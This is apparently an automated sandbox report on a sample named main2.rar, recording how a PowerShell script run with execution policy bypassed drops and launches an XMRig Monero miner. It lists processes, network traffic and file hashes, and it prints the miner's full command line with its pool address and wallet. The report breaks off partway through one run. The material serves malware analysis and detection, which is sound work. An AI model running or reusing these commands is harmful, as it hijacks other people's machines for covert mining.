Malware Analysis Report

2025-04-19 18:40

Sample ID 240526-qt2rmsgc9t
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

xmrig

XMRig Miner payload

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-26 13:33

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:25

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1776s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/596-3-0x00007FFA85F83000-0x00007FFA85F84000-memory.dmp

memory/596-5-0x0000016E68EA0000-0x0000016E68EC2000-memory.dmp

memory/596-8-0x00007FFA85F80000-0x00007FFA8696C000-memory.dmp

memory/596-9-0x0000016E69060000-0x0000016E690D6000-memory.dmp

memory/596-18-0x00007FFA85F80000-0x00007FFA8696C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kanfmakg.0rc.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/596-25-0x00007FFA85F80000-0x00007FFA8696C000-memory.dmp

memory/596-48-0x0000016E691E0000-0x0000016E691F2000-memory.dmp

memory/596-61-0x0000016E69040000-0x0000016E6904A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2440-90-0x00000243D0DA0000-0x00000243D0DC0000-memory.dmp

memory/2440-91-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/596-93-0x00007FFA85F83000-0x00007FFA85F84000-memory.dmp

memory/2440-92-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/596-94-0x00007FFA85F80000-0x00007FFA8696C000-memory.dmp

memory/596-95-0x00007FFA85F80000-0x00007FFA8696C000-memory.dmp

memory/2440-96-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-97-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-98-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-99-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-100-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-101-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-102-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-103-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-104-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-105-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-106-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-107-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-108-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-109-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-110-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-111-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-112-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-113-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-114-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-115-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-116-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-117-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-118-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-119-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-120-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-121-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-122-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-123-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-124-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-125-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-126-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-127-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-128-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-129-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-130-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-131-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-132-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-133-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-134-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-135-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-136-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-137-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-138-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-139-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-140-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-141-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-142-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-143-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-144-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-145-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-146-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-147-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-148-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-149-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-150-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-151-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-152-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-153-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-154-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-155-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

memory/2440-156-0x00007FF6C8910000-0x00007FF6C9543000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:27

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1768s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/600-0-0x00007FFFF2EF3000-0x00007FFFF2EF4000-memory.dmp

memory/600-5-0x000002105A5F0000-0x000002105A612000-memory.dmp

memory/600-6-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp

memory/600-11-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp

memory/600-10-0x000002105A7B0000-0x000002105A826000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ognhugff.c5l.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/600-29-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp

memory/600-52-0x000002105A790000-0x000002105A7A2000-memory.dmp

memory/600-65-0x000002105A770000-0x000002105A77A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3084-94-0x000001E118480000-0x000001E1184A0000-memory.dmp

memory/3084-95-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/600-97-0x00007FFFF2EF3000-0x00007FFFF2EF4000-memory.dmp

memory/3084-96-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/600-98-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp

memory/600-99-0x00007FFFF2EF0000-0x00007FFFF38DC000-memory.dmp

memory/3084-100-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-101-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-102-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-103-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-104-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-105-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-106-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-107-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-108-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-109-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-110-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-111-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-112-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-113-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-114-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-115-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-116-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-117-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-118-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-119-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-120-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-121-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-122-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-123-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-124-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-125-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-126-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-127-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-128-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-129-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-130-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-131-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-132-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-133-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-134-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-135-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-136-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-137-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-138-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-139-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-140-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-141-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-142-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-143-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-144-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-145-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-146-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-147-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-148-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-149-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-150-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-151-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-152-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-153-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-154-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-155-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-156-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-157-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-158-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-159-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

memory/3084-160-0x00007FF61AB80000-0x00007FF61B7B3000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:28

Platform

win10v2004-20240426-en

Max time kernel

1790s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

